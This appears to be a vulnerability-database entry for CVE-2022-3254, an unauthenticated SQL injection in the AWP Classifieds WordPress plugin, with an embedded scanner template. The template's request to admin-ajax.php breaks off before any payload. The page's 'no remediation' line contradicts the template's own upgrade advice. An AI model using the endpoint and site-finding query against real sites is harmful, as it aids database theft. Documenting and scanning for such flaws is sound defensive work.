CVE-2022-3254: AWP Classifieds <= 4.2.1 - Unauthenticated SQL Injection
Vulnerability description
WordPress Classifieds Plugin before 4.3 contains a SQL injection caused by improper sanitization and escaping of parameters in an AJAX action, letting unauthenticated attackers execute arbitrary SQL commands; exploitation requires the premium module to be active. [Public]

id: CVE-2022-3254

info:
  name: AWP Classifieds <= 4.2.1 - Unauthenticated SQL Injection
  author: Shivam Kamboj
  severity: critical
  description: |
    WordPress Classifieds Plugin before 4.3 contains a SQL injection caused by improper sanitization and escaping of parameters in an AJAX action, letting unauthenticated attackers execute arbitrary SQL commands, exploit requires the premium module to be active.
  remediation: |
    Update to version 4.3 or later.
  impact: |
    Attackers can execute arbitrary SQL commands, potentially leading to data theft, data tampering, or full database compromise.
  reference:
    - https://nvd.nist.gov/vuln/detail/CVE-2022-3254
    - https://wpscan.com/vulnerability/546c47c2-5b4b-46db-b754-c6b43aef2660
  metadata:
    verified: true
    max-request: 2
    publicwww-query: "plugins/another-wordpress-classifieds-plugin/"
  tags: cve,cve2022,sqli,wordpress,wp-plugin,awpcp,unauth,wp

http:
  - raw:
      - |
        GET /wp-admin/admin-ajax.php?action=a
Affected scope
Unknown
Remediation advice
None available